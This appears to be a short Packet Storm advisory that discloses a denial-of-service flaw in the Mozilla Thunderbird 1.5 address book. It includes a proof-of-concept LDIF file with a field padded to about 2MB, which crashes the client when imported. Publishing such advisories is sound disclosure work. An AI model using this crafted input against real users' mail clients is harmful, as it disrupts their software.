The Mozilla Thunderbird 1.5 address book allows fields of an unlimited size, allowing for a denial of service condition to be exploited.
aacb29ea08cb4255c83f773299c7973921482ef69a32875d3a009c236cb94e7eAffected: Mozila Thunderbird 1.5 /possibly other versions/
Mozila Thunderbird 1.5 address book allows fields of unlimited size in
the address book which leads to a DoS if you import such ldif file
POC: create a file.ldif and insert following then import it in address book:
------- start --------
n: cn=Test POC by DrFrancky@securax.org,mail=drfrancky@securax.org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky@securax.org
cn: POC by DrFrancky@securax.org
mozillaNickname: DrFrancky
mail: drfrancky@securax.org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
--------- end ---------
Credits:
DrFrancky
drfrancky@securax.org
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed